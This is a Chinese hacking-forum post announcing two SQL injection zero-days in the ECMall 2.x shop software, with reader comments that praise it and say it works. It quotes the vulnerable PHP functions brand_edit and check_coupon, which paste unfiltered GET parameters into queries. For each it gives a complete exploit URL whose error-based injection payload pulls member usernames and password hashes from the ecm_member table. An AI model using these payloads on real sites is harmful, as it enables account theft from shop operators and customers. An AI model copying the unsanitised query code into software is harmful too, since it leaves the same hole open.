ECMall 2.x 两枚注射
这程序放眼望去 各种白痴注入.... 这里随便发两个吧 顺便骂下电信 害的我现在下载速度只有几k 啥都干不了了 加载土司发帖页面都困难 我容易么我
Fuck one : \app\my_goods.app.php (2290行)Fuck one EXP 注册个会员-登录-提交以下即可
Fuck two : \app\order.app.php (374行)Fuck two EXP 注册个会员-登录-提交以下即可
测试:
免跨省声明: 以上所有言语非本人所写 更非本人所想 如果用于非法更与本人无关!
Fuck one : \app\my_goods.app.php (2290行)
function brand_edit()
{
$id = $_GET['id']; //程序员是2逼呢
$brand = $this->_brand_mod->find('store_id = ' . $this->_store_id . ' AND if_show = ' . BRAND_REFUSE . ' AND brand_id = ' . $id); //是2逼呢 还是2逼呢? By.Rices
$brand = current($brand);
if (empty($brand))
{
$this->show_warning("not_rights");
exit;
}
if (!IS_POST)
{ // 省略 .......http://site/index.php?app=my_goods&act=brand_edit&id=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x7e27,%20ecm_member.user_name,0x27,0x7e,%20ecm_member.password,0x7e,0x27)%20from%20ecm_member%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
Fuck two : \app\order.app.php (374行)
function check_coupon()
{
$coupon_sn = $_GET['coupon_sn'];
$store_id = $_GET['store_id']; //笑嘻嘻
if (empty($coupon_sn))
{
$this->js_result(false);
}
$coupon_mod =& m('couponsn');
$coupon = $coupon_mod->get(array(
'fields' => 'coupon.*,couponsn.remain_times',
'conditions' => "coupon_sn.coupon_sn = '{$coupon_sn}' AND coupon.store_id = " . $store_id, //射射射射射了 By.Rices
'join' => 'belongs_to_coupon'));
//省略........http://site/index.php?app=order&act=check_coupon&coupon_sn=1&store_id=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x7e,0x27,%20ecm_member.user_name,0x27,0x7e,%20ecm_member.password,0x7e,0x27)%20from%20ecm_member%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
测试:
免跨省声明: 以上所有言语非本人所写 更非本人所想 如果用于非法更与本人无关!
关于作者
评论34次
rices大牛辛苦啦。
这个凤姐头像的淫好厉害哇
大大的福利。。。。
0day = =好难得。
好东西要收藏
被TX收购后的公司程序员也变得2了
又现0DAY
这个测试过,很给力。
好用,这个版本用的人还挺多,
楼主的声明有意思.gif)
没有安全意识
这个程序 不是很多见啊, 对这个没什么印象
0day~~
学xi中阿
围观凤姐 哈哈!!
Rices牛逼~~最近忙了`都没空挖洞``
围观端午节0day,xi望tl00s早日回到以前热闹的场面
数字型注入 内核竟然不来个过滤 。。
笑嘻嘻笑嘻嘻笑嘻嘻笑嘻嘻笑嘻嘻笑嘻嘻笑嘻嘻笑嘻嘻
果断的支持一下 。